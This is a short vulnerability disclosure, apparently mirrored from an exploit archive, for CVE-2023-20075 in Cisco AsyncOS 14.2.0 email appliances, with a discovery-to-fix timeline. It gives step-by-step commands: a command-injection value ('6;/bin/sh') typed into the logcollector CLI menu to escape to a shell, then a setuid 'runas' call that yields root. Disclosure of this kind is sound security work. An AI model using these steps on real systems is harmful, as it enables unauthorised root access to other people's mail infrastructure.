Share
## https://sploitus.com/exploit?id=PACKETSTORM:225299
# About
    
    Security researcher: ly1g3, ly1g3[at]tuta.io 
    
    GPG fingerprint: https://keys.openpgp.org/vks/v1/by-fingerprint/5FE85CE4E8F675F5ABD2C0A33CE8BE447ED6D586
    
    Overview: Local Privilege Escalation and Shell Escape
    
    CVE: CVE-2023-20075
    
    Timeline:
    * Discovered - ly1g3
    * Reported - ly1g3
    * Fixed - Cisco
    
    
    # Cisco AsyncOS 14.2.0
    ESA (Cisco Secure Email)
    
    ## Privilege escalation - cli to root shell
    A authenticated user with access to the cli can escalate privileges to root and execute arbitrary code
    
    ### Steps to shell
    1. From cli run command `logcollector`
    2. Press `3`
    3. Enter value: `6;/bin/sh`
    4. Shell as user
    
    ### Steps to root
    1. From shell run suid binary runas
    2. `/data/release/phoebe-14*/bin/runas 0 /bin/sh`
    3. Shell as root